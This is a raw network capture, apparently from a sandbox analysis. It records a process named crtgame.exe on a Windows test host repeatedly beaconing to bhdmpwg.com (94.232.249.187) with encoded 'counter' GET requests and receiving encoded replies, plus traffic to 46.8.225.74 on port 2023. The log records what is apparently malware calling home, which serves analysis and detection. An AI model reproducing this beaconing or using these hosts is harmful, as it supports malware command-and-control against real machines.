Dec 14, 2024 03:04:01.986165047 CET  49976  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:02.105824947 CET  80     49976  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:03.336361885 CET  80     49976  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:03.336420059 CET  80     49976  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:03.336492062 CET  49976  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:03.336576939 CET  49976  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:03.355494976 CET  49979  2023   192.168.2.5     46.8.225.74
Dec 14, 2024 03:04:03.362832069 CET  49976  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:03.475425959 CET  2023   49979  46.8.225.74     192.168.2.5
Dec 14, 2024 03:04:03.475528002 CET  49979  2023   192.168.2.5     46.8.225.74
Dec 14, 2024 03:04:03.475579023 CET  49979  2023   192.168.2.5     46.8.225.74
Dec 14, 2024 03:04:03.475629091 CET  49979  2023   192.168.2.5     46.8.225.74
Dec 14, 2024 03:04:03.483109951 CET  80     49976  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:03.483247042 CET  49976  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:03.586500883 CET  49982  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:03.595516920 CET  2023   49979  46.8.225.74     192.168.2.5
Dec 14, 2024 03:04:03.595558882 CET  2023   49979  46.8.225.74     192.168.2.5
Dec 14, 2024 03:04:03.706536055 CET  80     49982  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:03.706749916 CET  49982  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:03.708288908 CET  49982  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:03.828063965 CET  80     49982  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:04.453275919 CET  2023   49979  46.8.225.74     192.168.2.5
Dec 14, 2024 03:04:04.455226898 CET  49979  2023   192.168.2.5     46.8.225.74
Dec 14, 2024 03:04:05.046397924 CET  80     49982  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:05.046643972 CET  49982  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:05.162364960 CET  49982  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:05.162708998 CET  49986  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:05.282550097 CET  80     49986  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:05.282665014 CET  49986  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:05.282681942 CET  80     49982  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:05.282749891 CET  49982  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:05.282936096 CET  49986  80     192.168.2.5     94.232.249.187
Dec 14, 2024 03:04:05.402940989 CET  80     49986  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:06.630875111 CET  80     49986  94.232.249.187  192.168.2.5
Dec 14, 2024 03:04:06.631011963 CET  49986  80     192.168.2.5     94.232.249.187
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 14, 2024 03:02:53.840830088 CET  64289        53         192.168.2.5   81.31.197.38
Dec 14, 2024 03:02:54.074011087 CET  53           64289      81.31.197.38  192.168.2.5

Timestamp                            Source IP    Dest IP       Trans ID  OP Code             Name         Type            Class        DNS over HTTPS
Dec 14, 2024 03:02:53.840830088 CET  192.168.2.5  81.31.197.38  0xd864    Standard query (0)  bhdmpwg.com  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP     Dest IP      Trans ID  Reply Code    Name         CName  Address         Type            Class        DNS over HTTPS
Dec 14, 2024 03:02:54.074011087 CET  81.31.197.38  192.168.2.5  0xd864    No error (0)  bhdmpwg.com         94.232.249.187  A (IP address)  IN (0x0001)  false

• bhdmpwg.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49788        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:02:54.257744074 CET  295                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:02:55.599689007 CET  220                IN         HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:02:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:02:55.707192898 CET  295                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:02:56.223267078 CET  1038               IN         HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:02:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 33 33 65 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 37 35 39 33 63 65 30 30 64 35 34 39 39 35 31 30 65 64 66 65 66 66 36 64 37 66 64 65 33 34 32 38 62 32 30 33 39 33 38 30 33 63 32 64 36 34 37 38 63 30 66 30 35 39 34 32 30 63 65 31 62 65 35 34 61 65 39 62 31 65 38 34 66 39 65 35 36 38 39 33 38 30 32 39 33 33 30 38 35 35 66 39 32 39 64 33 63 32 32 36 63 34 38 61 30 32 30 32 32 36 63 63 34 39 31 37 39 32 63 38 61 38 30 63 35 33 63 35 61 35 38 38 65 64 62 30 36 66 39 31 61 63 66 64 38 35 61 61 64 32 34 33 66 31 63 34 61 63 39 35 39 32 32 63 35 35 62 66 38 33 36 38 36 34 32 34 37 61 65 32 36 65 62 61 36 31 66 38 65 35 39 35 30 61 33 61 39 61 32 38 65 65 39 64 36 61 34 35 63 65 61 66 61 62 37 39 38 64 66 32 64 33 38 38 31 31 30 61 33 33 31 65 36 37 30 30 37 61 31 62 65 36 30 61 65 30 33 64 37 62 64 37 39 39 38 31 34 61 66 63 30 39 33 33 39 34 61 38 32 62 39 64 36 32 65 38 32 65 35 38 32 65 37 30 35 66 38 34 66 64 64 35 39 32 65 63 35 32 61 61 65 39 39 32 [TRUNCATED]
Data Ascii: 33ede2ffe912c1a5259eb23643d6c02a7593ce00d5499510edfeff6d7fde3428b20393803c2d6478c0f059420ce1be54ae9b1e84f9e568938029330855f929d3c226c48a020226cc491792c8a80c53c5a588edb06f91acfd85aad243f1c4ac95922c55bf836864247ae26eba61f8e5950a3a9a28ee9d6a45ceafab798df2d388110a331e67007a1be60ae03d7bd799814afc093394a82b9d62e82e582e705f84fdd592ec52aae9924c07c13494990c3f1dff2717e482b3bb563f5b32b2823aac867663c1fff9d605241a049b7adf1d73721121d235bd800d2420c57fe13043e8af9c17b8496db8d114c31daaf4169ecfb72569ee25e8706f501469d24caf1a22454e873ca653d62a64cfcebd11f2806c5bb93c2c9e15479da511981043cd32690dc79165667144f95c3019ac49e2f6097d0c733671dbc2751d9d83f451e12b305e4ec72558459f0ec020da8a2f36d45165d915065bdf5acc3de1ba56014a12eea0b6407704fd65dc5f510268c4e71edded588ea32d6e7392645e8214bce414dc1aef01bfe94e4429fdfc1bbfa2718e58de59f2b76296dae739f98532e9841831e0
Dec 14, 2024 03:02:59.629101992 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:00.188304901 CET  220                IN         HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49805        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:00.421243906 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:01.776679039 CET  900                IN         HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 32 62 34 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 63 30 65 35 35 38 32 34 65 30 66 64 62 65 37 61 36 39 31 62 39 61 35 32 62 63 65 36 64 36 31 37 63 35 62 63 66 64 64 35 33 64 63 34 38 35 66 63 62 34 39 38 39 35 61 65 61 34 31 66 36 62 62 66 36 34 34 39 39 35 36 39 37 33 39 30 61 39 32 32 66 38 35 34 37 39 61 39 63 33 66 33 63 36 65 34 36 61 31 33 66 32 34 37 37 63 39 39 32 36 37 32 64 38 38 38 32 64 61 33 36 35 66 34 63 38 65 64 33 30 37 65 37 31 30 63 39 63 37 35 64 62 33 32 66 33 35 31 65 35 34 63 62 35 63 32 61 64 61 35 63 66 38 32 32 38 32 34 61 34 36 62 30 32 63 65 64 62 62 31 62 39 30 35 30 35 32 61 33 62 37 61 33 38 39 66 63 64 36 61 35 35 36 66 65 66 61 62 30 39 61 63 31 32 37 33 39 38 35 30 62 62 63 33 39 65 64 37 62 31 38 61 30 62 39 37 65 61 34 30 32 64 63 62 31 36 36 39 61 31 30 61 63 64 35 39 31 33 65 35 37 39 64 62 66 64 32 32 36 39 64 65 34 38 32 65 30 31 30 66 30 34 33 63 30 35 31 32 39 64 62 32 62 61 61 39 37 33 [TRUNCATED]
Data Ascii: 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


Session ID 2  Source 192.168.2.5:49808  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:02.124443054 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:03.473124981 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:03.582014084 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:04.077919960 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 3  Source 192.168.2.5:49814  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:04.311904907 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:05.664997101 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:05.769467115 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:06.269340038 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:06.378938913 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:06.873361111 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 4  Source 192.168.2.5:49823  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:07.108853102 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:08.485445976 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 5  Source 192.168.2.5:49825  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:08.718760967 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:10.100992918 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:10.208086967 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:10.708271980 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:10.816530943 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:11.317264080 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:11.426047087 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:11.921869993 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 6  Source 192.168.2.5:49835  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:12.165823936 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:13.507949114 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:13.613442898 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:14.105442047 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 7  Source 192.168.2.5:49841  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:14.343206882 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:15.691982985 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:15.800853968 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:16.306653023 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 8  Source 192.168.2.5:49847  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:16.546365976 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:17.892489910 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 9  Source 192.168.2.5:49852  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:18.124299049 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:19.467962027 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 10  Source 192.168.2.5:49856  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:19.702567101 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:21.044363976 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370


Session ID 11  Source 192.168.2.5:49861  Destination 94.232.249.187:80  PID 5460  Process C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp  Bytes transferred  Direction  Data
Dec 14, 2024 03:03:21.281172991 CET  303 bytes  OUT
    GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
    Host: bhdmpwg.com
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:22.655149937 CET  220 bytes  IN
    HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Sat, 14 Dec 2024 02:03:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
    Data Ascii: ede2ff49a2e11370
